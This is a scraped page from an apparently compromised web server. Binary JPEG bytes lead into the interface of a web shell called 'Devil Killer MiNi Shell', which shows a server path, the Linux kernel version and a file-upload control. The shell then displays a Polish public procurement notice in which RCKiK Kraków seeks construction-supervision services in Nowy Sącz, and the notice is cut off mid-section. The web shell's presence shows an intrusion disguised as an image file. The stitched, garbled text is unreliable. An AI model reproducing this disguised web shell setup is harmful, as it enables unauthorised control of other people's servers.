JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220331/0010566601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Pełnienie funkcji inwestora zastępczego inwestycji pn. Zaprojektowanie i wybudowanie na działce ew. 37 obr. 89 przy ul. Sienkiewicza 55 w Nowym Sączu Terenowego Oddziału RCKiK w Krakowie.&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Regionalne Centrum Krwiodawstwa i Krwiolecznictwa w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000297282</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rzeźnicza 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 12 2618820</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@rckik.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rckik.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Pełnienie funkcji inwestora zastępczego inwestycji pn. Zaprojektowanie i wybudowanie na działce ew. 37 obr. 89 przy ul. Sienkiewicza 55 w Nowym Sączu Terenowego Oddziału RCKiK w Krakowie.&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cc0edd21-ae77-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00105666</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00035158/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Pełnienia funkcji zarządzającego procesem inwestycji pod nazwą: Zaprojektowanie i wybudowanie przy ul. Sienkiewicza 55 w Nowym Sączu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rckik_krakow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/rckik_krakow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zaleca się przed przystąpieniem do postępowania rejestrację na Platformie Zakupowej – rejestracja nie jest obowiązkowa. W trakcie procesu rejestracji Wykonawca wypełnia wszystkie pola formularza rejestracji, chyba że pole oznaczone jest jako opcjonalne. Rejestracja na Platformie Zakupowej wymaga akceptacji regulaminu.<br/>Zakładając konto użytkownika, Wykonawca wyraża wolę zawarcia umowy na świadczenie usług drogą elektroniczną.<br/>Niezwłocznie po przesłaniu wypełnionego formularza, Wykonawca otrzyma drogą elektroniczną na adres e-mail wskazany w procesie rejestracji potwierdzenie założenia konta wraz z linkiem aktywacyjnym.<br/>Z chwilą aktywacji konta Wykonawca ma dostęp do usług nieodpłatnych udostępnionych w ramach konta użytkownika, w tym między innymi składania ofert i prowadzenia korespondencji z Zamawiającym za pośrednictwem Platformy Zakupowej, automatycznego wycofania oferty w przypadku złożenia nowej oferty.<br/>Maksymalny rozmiar plików lub spakowanych plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>Występuje limit ilości plików, maksymalna liczba plików możliwych do załączenia - 10 plików lub spakowanych folderów. W przypadku większych plików zaleca się spakowanie pli-ków w mniejsze paczki po 150 MB każda.<br/>Dopuszczalny format plików to: .doc, docx, odt, pdf, xls.<br/>Dopuszczalny format kompresji to: zip7, rar.<br/>Za datę złożenia oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich wczytania na Platformie Zakupowej lub ich otrzymania przez Zamawiającego na wskazany adres e-mail do kontaktów z Wykonawcami. <br/>Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej:<br/>a.	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 56 KB/s.<br/>b.	Komputer klasy PC z zainstalowanym systemem operacyjnym Microsoft Windows XP/Vista/Windows 7/ Windows 10 lub iOS; w przypadku komputera z systemem operacyjnym Microsoft Windows 7/ Windows 8 przeglądarka MS Internet Explorer 10.0 (lub nowsza) z obsługą Active X lub dla systemów operacyjnych XP/Vista/Windows 7/Windows 8 przeglądarka Firefox z obsługą Javy, siła szyfrowania: 128bit; w przypadku komputera z systemem operacyjnym Microsoft Windows 10 przeglądarka MS Internet Explorer 11 z obsługą Active X lub FireFox z obsługą Javy, siła szyfrowania: 128bit.<br/>c.	Zainstalowana dowolna przeglądarka internetowa: Chrome; Mozilla, FireFox, Safari.<br/>d.	Podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę.<br/>Dopuszczalny format kwalifikowanego podpisu elektronicznego: <br/>a.	Dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES. <br/>b.	Dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć oddzielny plik z podpisem. <br/>c.	W przypadku podpisywania dokumentów podpisem zewnętrznym – Wykonawca spakuje pliki (podpis + dokument) w jedno archiwum (Zamawiający dopuszcza formaty .zip, .7z, RAR) i spakowany plik umieści na Platformie Zakupowej.<br/>Inne dopuszczalne formaty podpisów:<br/>a.	Wykonawcy nieposiadający kwalifikowanego podpisu elektronicznego, ofertę lub oświadczenia lub dokumenty podpisują podpisem zaufanym albo elektronicznym podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust 1-2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych (Dz. Urz. UE L 119, s.1) – zwanego dalej RO-DO- informujemy, że:<br/>Administratorem Państwa danych osobowych jest Regionalne Centrum Krwiodawstwa i Krwiolecznictwa w Krakowie przy ul. Rzeźniczej 11 31-540 Kraków.<br/>Wyznaczyliśmy inspektora ochrony danych, z którym można skontaktować się w sprawach ochrony swoich danych osobowych po adresem e-mail: iodo@rckik-krakow.pl lub pisemnie na adres siedziby Administratora.<br/>Celem przetwarzania jest: realizacja procedury przetargowej czyli realizacja obowiązków wynikających z przepisów prawa. Podstawą przetwarzania jest (art. 6 ust.1 lit c) ogólnego rozporządzenia) w związku z art. 132 i 275 ustawy prawo zamówień publicznych z dnia 11.09.2019r. <br/>Odbiorcami Państwa danych osobowych będą: podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa, tj. inne podmioty uczestniczące w realizacji, ponadto postępowanie o udzielenie zamówienia publicznego jest ustawowo procedurą jawną i każdy może zapoznać się z jej treścią. Wykonawca ma prawo utajnić swoją ofertę w części dotyczącej tajemnicy przedsiębiorstwa.<br/>Państwa dane osobowe zawarte w protokołach przetargowych będą przechowywane, zgodnie z art. 78 ust. 4 ustawy Prawo Zamówień Publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>Podanie danych ma charakter obligatoryjny i jest wymogiem prawnym<br/>W wyniku przetwarzania danych przysługują Państwu, określone prawa wynikające z RODO<br/>a.	prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>b.	prawo do sprostowania (poprawiania) swoich danych;<br/>c.	prawo do usunięcia danych, ograniczenia przetwarzania danych;<br/>d.	prawo do wniesienia sprzeciwu wobec przetwarzania danych;<br/>e.	prawo do przenoszenia danych;<br/>f.	prawo do wniesienia skargi do organu nadzorczego UODO ul. Stawki 2 w Warszawie.<br/>Należy wskazać iż realizacja niektórych praw może podlegać ograniczeniom wynikającym z realizacji przepisów prawa.<br/>Państwa dane nie będą przekazywane do Państwa trzecich .<br/>Państwa dane nie będą przedmiotem zautomatyzowane procesu przetwarzania w tym profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-05/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 398983,79 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowi usługa polegająca na pełnieniu funkcji inwestora zastępczego dla inwestycji pn. Zaprojektowanie i wybudowanie na działce ew. 37 obr. 89 przy ul. Sienkiewicza 55 w Nowym Sączu Terenowego Oddziału RCKiK w Krakowie.” <br/>Zakres przedmiotu zamówienia obejmuje w szczególności: Zapoznanie się i zaopiniowanie (weryfikacja) dokumentacji projektowej i materiałów, w szczególności projektu budowlanego, koncepcji i wytycznych do projektów wykonawczych, w każdej z branż; Zamawiający oczekuje także oceny zgodności i poprawności przedstawionych kosztorysów i przedmiarów z projektem. Wykonawca zobowiązany będzie do udziału w procedurze odbioru dokumentacji projektowej – opinia dotyczyć będzie kwestii formalnych (kompletność pod kątem celu jakiemu ma dokumentacja służyć) i merytorycznym. Bieżące konsultacje, uzgadnianie i weryfikacja oraz akceptacja otrzymanych projektów, w szczególności kompletu projektów wykonawczych oraz projektów aranżacji wnętrz; Przygotowanie i organizacja procesu budowlanego; Przygotowanie i współudział w charakterze biegłego w przeprowadzeniu postępowań o wyłonienie wykonawców prac projektowych, robót budowlanych, usług i dostaw niezbędnych dla realizacji inwestycji, zgodnie z przepisami ustawy 11 września 2019r. – Prawo zamówień publicznych (tekst jedn. Dz.U. 2021 r., poz. 1129),, a w tym w szczególności konsultacje i uzgadnianie opisów przedmiotu zamówień, warunków i kryteriów oceny ofert i realizacji zamówień, weryfikacja merytoryczna ofert; Przekazanie wykonawcom terenu budowy; Nadzór inwestorski przy realizacji Inwestycji, w tym nad wszystkimi branżami, zgodnie z obowiązującymi przepisami, w tym w szczególności:<br/>a.	ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2021 r. poz. 2351 z późn. zm.);<br/>b.	ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (tekst jedn. Dz. U. z 2021 r. poz. 1213 z późn. zm.);<br/>c.	rozporządzeniem Parlamentu Europejskiego i Rady (UE) Nr 305/2011 z dnia 9 marca 2011 r. ustanawiającym zharmonizowane warunki wprowadzania do obrotu wyrobów budowlanych i uchylającego dyrektywę Rady 89/106/EWG (Dz. Urz. UE L 88 z 04.04.2011), a w przypadku wyrobów budowlanych – również zgodnie z zamierzonym zastosowaniem; Wydawanie kierownikowi budowy lub kierownikowi robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych oraz informacji i dokumentów potwierdzających zastosowanie przy wykonywaniu robót budowlanych wyrobów, a także informacji i dokumentów potwierdzających dopuszczenie do stosowania urządzeń technicznych; Żądanie od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót; Wstrzymanie robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę; Nadzór nad zapewnieniem bezpieczeństwa i przestrzeganiem przepisów przeciwpożarowych oraz bezpieczeństwa i higieny pracy przez wszystkich uczestników procesu realizacji Inwestycji, w rozumieniu wymagań stawianych przez prawo budowlane i inne obowiązujące przepisy, podczas całego procesu realizacji Inwestycji; Przygotowanie i koordynacja sposobu rozliczeń pomiędzy Zamawiającym, a Wykonawcą robót budowlanych na dostawę energii elektrycznej, wody, energii cieplnej itp. niezbędnych do wykonania zadania inwestycyjnego; Sprawdzanie dokumentów rozliczeniowych Zadania Inwestycyjnego pod względem merytorycznym i rachunkowym; Inicjowanie wprowadzania zmian do treści umów zawartych z wykonawcami Inwestycji przez przygotowywanie stosownych aneksów do tych umów, w związku ze zmianami warunków określonych w umowach; Wykonawca zobowiązany jest do oceny zasadności i wysokości roszczeń wykonawcy robót budowlanych w zakresie wystąpienia robót zamiennych, robót zaniechanych, robót dodatkowych a także zamówień dodatkowych. Zamawiający oczekuje od Wykonawcy uwzględnienia zasad rozliczeń z Wykonawcą określonych umownie w przedstawionej ocenie. Prowadzenie narad roboczych na terenie budowy Inwestycji z udziałem Inwestora nie rzadziej niż raz w tygodniu; Przeprowadzanie odbiorów i rozliczeń częściowych realizacji Zadania Inwestycyjnego; Przygotowanie materiałów do odbioru końcowego Inwestycji, powiadomienie wszystkich uczestników procesu inwestycyjnego o terminie odbioru końcowego Inwestycji oraz dokonanie odbioru końcowego Inwestycji; Uzyskanie wszystkich wymaganych przepisami prawa decyzji administracyjnych, opinii, uzgodnień, zezwoleń i pozwoleń oraz stanowisk organów administracyjnych w związku z zakończeniem procesu inwestycyjnego jako pełnomocnik Zamawiającego; Przekazanie Zadania Inwestycyjnego wraz z kompletem niezbędnych dokumentów w stanie faktycznym i prawnym zdatnym do natychmiastowego rozpoczęcia użytkowania; Odbiór robót, dostaw lub usług (w tym odbiory inspektorów w poszczególnych branżach); Wnioskowanie (do Projektanta) o przeprowadzenie przez niego nadzorów autorskich; Koordynacja wydawania nadzorów autorskich; Organizacja i prowadzenie, na wniosek kierownika budowy, odbiorów: robót zanikających, odbiorów częściowych, odbiorów końcowych, odbiorów pogwarancyjnych; Opiniowanie rozwiązań technicznych i kosztowych wynikających z rysunków warsztatowych (sporządzanych przez Wykonawcę robót) i nadzorów autorskich (sporządzanych przez Projektanta) i przekazywanie opinii do decyzji Inwestora co do zasadności wprowadzenia zmian i ich wpływu na warunki eksploatacji obiektu, jakości wykonania prac i zasadności z uwzględnieniem zasad rozliczeń z wykonawcą robót budowlanych; Archiwizacja protokołów z narad roboczych, korespondencji i dokumentacji, a następnie przekazanie ich Inwestorowi Bezpośredniemu w stanie kompletnym po zakończeniu Inwestycji lub rozwiązaniu niniejszej umowy. Zamawiający wymaga, aby do 3 dni roboczych od zgłoszenia Wykonawca udostępnił lub zapewnił dostęp Zamawiającemu do zarchiwizowanych materiałów w całości lub określonych częściach; Przygotowanie i opiniowanie wniosków o roboty zamienne, roboty zaniechane i roboty dodatkowe; Rozliczenie końcowe Zadania Inwestycyjnego wraz z przygotowaniem dokumentów do przejęcia środków trwałych; Występowanie w imieniu Inwestora przed organami administracji i przed sądami w sprawach wynikających z realizacji Zadań Inwestycyjnych; Naliczanie w imieniu Inwestora kar umownych lub odszkodowań od wykonawców oraz dostawców i niezwłoczne przekazywanie ich Inwestorowi; Uzyskanie pozwoleń na użytkowanie zgodnie z obowiązującymi przepisami prawa i procedurami; Działanie na podstawie pełnomocnictwa w postępowaniach administracyjnych.<br/>Realizacja i wykonywanie przedmiotu zamówienia będzie występowało w Nowym Sączu oraz w razie konieczności wynikającej z przebiegu Inwestycji, Wykonawca zobowiązany jest do wykonywania swoich obowiązków także w innym miejscu, w szczególności obejmuje to miejsca spotkań z innymi podmiotami biorącymi udział w realizacji Inwestycji, siedziby urzędów itp. lub w siedzibie biura Wykonawcy, przy czym Wykonawca jest zobowiązany zapewnić obecność Kierownika Projektu w siedzibie Zamawiającego w godzinach pracy Zamawiającego, na każde wezwanie Zamawiającego, przekazane Wykonawcy z co najmniej 12 godzinnym wyprzedzeniem, a właściwych branżowych inspektorów nadzoru w zakresie robót budowlanych w godzinach pracy Zamawiającego, codziennie w przypadku realizacji robót w danej branży co najmniej po 2 godziny oraz na każde wezwanie Zamawiającego, przekazane Wykonawcy z co najmniej 12 godzinnym wyprzedzeniem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <p class="mb-0">71541000-2 - Usługi zarządzania projektem budowlanym</p> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <p class="mb-0">79421000-1 - Usługi zarządzania projektem inne niż w zakresie robot budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Obliczenia w kryteriach dokonywane będą do dwóch miejsc po przecinku, przy zastosowaniu zaokrąglania punktów według następującej zasady: gdy trzecia cyfra po przecinku wynosi 5 lub jest większa niż 5, zaokrąglenie drugiej cyfry po przecinku następuje w górę o jeden, a jeżeli trzecia cyfra po przecinku jest niższa od 5, to cyfra ta zostaje skreślona, a druga cyfra po przecinku nie ulega zmianie. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną lub najniższym kosztem, a jeżeli zostały złożone oferty o takiej samej cenie lub koszcie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia ofert dodatkowych w wyznaczonym terminie. Zamawiający podpisze umowę z Wykonawcą, którego oferta zawiera najkorzystniejszy bilans w podanych kryteriach spośród ofert niepodlegających odrzuceniu. Pozostałe oferty zostaną ocenione wg algorytmów, określonych w pkt 1 niniejszej Sekcji SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zespołu nadzoru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 